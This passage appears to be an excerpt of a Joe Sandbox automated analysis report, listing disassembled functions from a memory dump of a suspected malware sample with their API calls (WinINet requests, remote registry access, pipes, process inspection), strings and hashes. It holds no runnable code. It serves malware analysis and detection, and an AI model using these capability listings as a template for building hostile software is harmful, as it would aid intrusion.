SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D2C97

Strings

0, xrefs: 007D2B73

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 5c8749d178fd3aae25ac63c4d4f1a4b856e8fe65e2c7bdc6aef71ef05a12c26c
Instruction ID: dd8875073de6c42f5d1569a3fded9e57f678d7f8c28d1e5a97e9d00312409607
Opcode Fuzzy Hash: 5c8749d178fd3aae25ac63c4d4f1a4b856e8fe65e2c7bdc6aef71ef05a12c26c
Instruction Fuzzy Hash: 7D51AF716283009AD7249F28D84566F77F4EFA5350F044A2FF899D33A2DB68CD0797A2

Function 00783137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00783277
_memmove.LIBCMT ref: 00783310
_free.LIBCMT ref: 00783336
_memmove.LIBCMT ref: 007833E9

Strings

_x, xrefs: 00783322
3cx, xrefs: 00783225

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cx$_x
API String ID: 2620147621-2911194521
Opcode ID: fc9d5d0d73902333b804fa6ec9b9cb55453ed546e7d084c3e94ba1fae4b7f710
Instruction ID: c4927a9ebdbe73ee00b80c5d03c62b56cfb81dfba3dcc35fe23bfee94bb8e4e5
Opcode Fuzzy Hash: fc9d5d0d73902333b804fa6ec9b9cb55453ed546e7d084c3e94ba1fae4b7f710
Instruction Fuzzy Hash: 68516C71A043818FDB25DF28C484B6EBBE5FF85710F04482DE99987351EB39E901CB82

Function 00786192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00786248
_memmove.LIBCMT ref: 007862E4
_memset.LIBCMT ref: 00786308

Strings

3cx, xrefs: 007862AF
ERCP, xrefs: 007861B3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cx$ERCP
API String ID: 2532777613-1958986756
Opcode ID: b0085190fa381d7bc84803c55374a2fd8ad11d25742af09d5adc53125c10714f
Instruction ID: a537c2b40750986a284a63ea80564e201abf16119f2ad9c15fd0272aae3309dd
Opcode Fuzzy Hash: b0085190fa381d7bc84803c55374a2fd8ad11d25742af09d5adc53125c10714f
Instruction Fuzzy Hash: E5519F71A40305EBDB24EFA5C945BAAB7F4FF04314F2045AEE54AC7241E778AA44CB80

Function 007CD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007CD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007CD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007CD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007CD69D

Strings

DllGetClassObject, xrefs: 007CD610

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: b15d854941070ff317117f168a5be85707c37f0e257d8b0bd4c08fbddd76ed3b
Instruction ID: c02d72f191762f8e4c29209ab194f98c7dc7e7e644018c79777e38c5779a4d27
Opcode Fuzzy Hash: b15d854941070ff317117f168a5be85707c37f0e257d8b0bd4c08fbddd76ed3b
Instruction Fuzzy Hash: F4417CB1600204EFDB25CF64C888FAA7BA9EF44754F1580BDE909AF205D7B9DD44CBA0

Function 007D2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 007D2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00835890,00000000), ref: 007D286B

Strings

0, xrefs: 007D27B5

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 1d320fd3648b7e7bdd6f34e9fcce9926f0d4cf29fac8581e0d91118aa1e5519a
Instruction ID: b52eb3c8d6d9a542f3c08c2b904e0f959ad35db8a13bcc10959c43f124d0b279
Opcode Fuzzy Hash: 1d320fd3648b7e7bdd6f34e9fcce9926f0d4cf29fac8581e0d91118aa1e5519a
Instruction Fuzzy Hash: EC4180706043419FDB24DF24C844B2ABBF4EF95314F14892EF96597392DB38A907DB62

Function 007ED7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007ED7C5

Part of subcall function 0077784B: _memmove.LIBCMT ref: 00777899

Strings

stdcall, xrefs: 007ED847
cdecl, xrefs: 007ED81C
none, xrefs: 007ED8A0
winapi, xrefs: 007ED836

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 93749733d0d873107147c259f70a71ef765ebd4dc6a3555411edea8d644153f3
Instruction ID: 33f422f592be9c06e63f844acdac721ac4dea3197cf60c6b16f665e8146793dd
Opcode Fuzzy Hash: 93749733d0d873107147c259f70a71ef765ebd4dc6a3555411edea8d644153f3
Instruction Fuzzy Hash: 7C31CD71904219EFCF10EF95C8459AEB3B4FF08320B008629E879A73D1DB79AD05CB80

Function 007C8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007CAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 007C8F57

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

Strings

ListBox, xrefs: 007C8ED3
ComboBox, xrefs: 007C8E9E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 02319f647098fb5b5bbf237e6b8365fc764c813929e55d6ee3e24ff60462a6bb
Instruction ID: 45471d84b6c47b7931171e7067c64ba8b3c3ab9cbc8bf90e1a692bcc3f59dae6
Opcode Fuzzy Hash: 02319f647098fb5b5bbf237e6b8365fc764c813929e55d6ee3e24ff60462a6bb
Instruction Fuzzy Hash: 1A21BD71A04108BADB18ABB09C8AEFFB769EF05360F14852DF425A62E1DF7D5809D660

Function 007E182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007E18A2
InternetCloseHandle.WININET(00000000), ref: 007E18E9

Part of subcall function 007E2483: GetLastError.KERNEL32(?,?,007E1817,00000000,00000000,00000001), ref: 007E2498
Part of subcall function 007E2483: SetEvent.KERNEL32(?,?,007E1817,00000000,00000000,00000001), ref: 007E24AD

Strings

, xrefs: 007E1893

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9bbc90f73f7a68a0d2d097112fee4be39e8901aad6482b80f697035b1fe99b79
Instruction ID: 0d48c677ded2042d7520dbc16c6be8f9a1d489f6efe28f350636babc1f77ecfd
Opcode Fuzzy Hash: 9bbc90f73f7a68a0d2d097112fee4be39e8901aad6482b80f697035b1fe99b79
Instruction Fuzzy Hash: 8C21D0B1501348BFEB119B62CC8AEBB77ECEB4C754F50412AF405E2240DB389D0597B1

Function 007F63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6461
LoadLibraryW.KERNEL32(?), ref: 007F6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F647D
DestroyWindow.USER32(?), ref: 007F6485

Strings

SysAnimate32, xrefs: 007F643C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 9deffba6597c7d98b5a54b831486516853ec6fc03ee243b5b0b5175adec5e885
Instruction ID: ef64354a8a7976ebb266b61f2b3a3c154ea086f1b080db8674027d367d230d8b
Opcode Fuzzy Hash: 9deffba6597c7d98b5a54b831486516853ec6fc03ee243b5b0b5175adec5e885
Instruction Fuzzy Hash: E8218B71200249FBEF106F64DC84EBA37A9EF59764F108629FA10D2290DB39DC41A760

Function 007D6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007D6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D6DEF
GetStdHandle.KERNEL32(0000000C), ref: 007D6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D6E3B

Strings

nul, xrefs: 007D6E36

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 5de82b37448d9d8582443a4a29d003a923f6919f3911c5b0e86e21b792ace4d5
Instruction ID: 7e6dad534a17d720bb0cb44b7babc8027c0cb6403bfa4730f79c5f2b6ffd5a2a
Opcode Fuzzy Hash: 5de82b37448d9d8582443a4a29d003a923f6919f3911c5b0e86e21b792ace4d5
Instruction Fuzzy Hash: B2217F75600209ABDF209F29E804A9A77B5FF44720F20461AF9A0D73D0DB74A950CB64

Function 007D6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007D6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D6EBB
GetStdHandle.KERNEL32(000000F6), ref: 007D6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D6F06

Strings

nul, xrefs: 007D6F01

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 7d7e5b18ac29a4d2ccb6349e30da1629fb68111dd58c5e2706da07d92c4bec06
Instruction ID: a0ec85adc423edd397a88968d2b3102d4e112cca08777dcab036c9899ea6585d
Opcode Fuzzy Hash: 7d7e5b18ac29a4d2ccb6349e30da1629fb68111dd58c5e2706da07d92c4bec06
Instruction Fuzzy Hash: DC215C796003059BDB209F69D844AAA77B8BF55720F204A1BFCA1D73D0EB78A851CB64

Function 007DAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DACA8
__swprintf.LIBCMT ref: 007DACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,007FF910), ref: 007DACFF

Strings

%lu, xrefs: 007DACBB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 73c7d0f028258842f188a31d9edef5365efa046e52a6eed2556639f085746c54
Instruction ID: 70f6e946f1c1d4f5cfa2feba56260c11fc1945dfaf17554d5b88c51d93055750
Opcode Fuzzy Hash: 73c7d0f028258842f188a31d9edef5365efa046e52a6eed2556639f085746c54
Instruction Fuzzy Hash: BF217F74A00109EFCB10DF64DD89DAE7BB8FF89714B0080A9F909EB351DA75EA41CB21

Function 007D1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007CFCED,?,007D0D40,?,00008000), ref: 007D115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,007CFCED,?,007D0D40,?,00008000), ref: 007D1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007CFCED,?,007D0D40,?,00008000), ref: 007D118E
Sleep.KERNEL32(?,?,?,?,?,?,?,007CFCED,?,007D0D40,?,00008000), ref: 007D11C1

Strings

@}, xrefs: 007D119D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @}
API String ID: 2875609808-348202782
Opcode ID: 84fa5ac91610ad4b00bb63b6306fe4b0cbaefa4f9f5388d6f8090d7921347970
Instruction ID: ae1981bb41c25b44f9c2d65b42e2259de213e5c28cc116eb41fec7f0ac463456
Opcode Fuzzy Hash: 84fa5ac91610ad4b00bb63b6306fe4b0cbaefa4f9f5388d6f8090d7921347970
Instruction Fuzzy Hash: 84113C31D0051DEBCF009FA5D848AEEFB78FF09711F418156EA81B2240CB799560CB95

Function 007D1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007D1B19

Strings

REMOVE, xrefs: 007D1B1F
KEYS, xrefs: 007D1B30
APPEND, xrefs: 007D1B52
EXISTS, xrefs: 007D1B41

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 2660c3068453b0ec465a1aefba3471dc8d69d46df9852302212b07ef6e6ee024
Instruction ID: 14cc7b5d3bfdec31d026862d9a759d3f6c3fc96c2bf2385403674eb25103b1f3
Opcode Fuzzy Hash: 2660c3068453b0ec465a1aefba3471dc8d69d46df9852302212b07ef6e6ee024
Instruction Fuzzy Hash: C3116171910119DFCF00EFA4E9558FEB7B4FF25304B508466D814AB391EB365D0ADB90

Function 007EEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EED6A
CloseHandle.KERNEL32(?), ref: 007EEDEB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: dd83f4d55c3b09e9923acfa76ffce09ff9e0dee88a6b6f22be8072ebe3e794e8
Instruction ID: 84592dc8227bf924a17724cc15be07aa8cfaf2bfaccd43b7dc38928a0ae74d5b
Opcode Fuzzy Hash: dd83f4d55c3b09e9923acfa76ffce09ff9e0dee88a6b6f22be8072ebe3e794e8
Instruction Fuzzy Hash: 0E8171716013009FDB60EF29CC8AF2AB7E5AF48750F04C85DF959DB292DA74AC40CB52

Function 0079541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079547B
_memcpy_s.LIBCMT ref: 007954ED
__read_nolock.LIBCMT ref: 0079554B
__filbuf.LIBCMT ref: 0079556E
_memset.LIBCMT ref: 007955B2

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 791563e2dc5a67e5cb6dcf5ae270d884ce5a7d17d2be01c3ee876aca48a621a0
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 2151E770A00B15DBCF269F69F88456E77B3AF41330F248729F835962D2D7789D618B40

Function 007F0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007F0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFDAD,?,?), ref: 007F0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F0183
RegCloseKey.ADVAPI32(?,?), ref: 007F01AF
RegCloseKey.ADVAPI32(00000000), ref: 007F01BC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 5c179d9493bffd473727e921dbcceae39c056f415703f4301679ac670b41fe41
Instruction ID: 8fca76705073342a679e7bba296eea367dcbe9132f2cb988519153cdd6057593
Opcode Fuzzy Hash: 5c179d9493bffd473727e921dbcceae39c056f415703f4301679ac670b41fe41
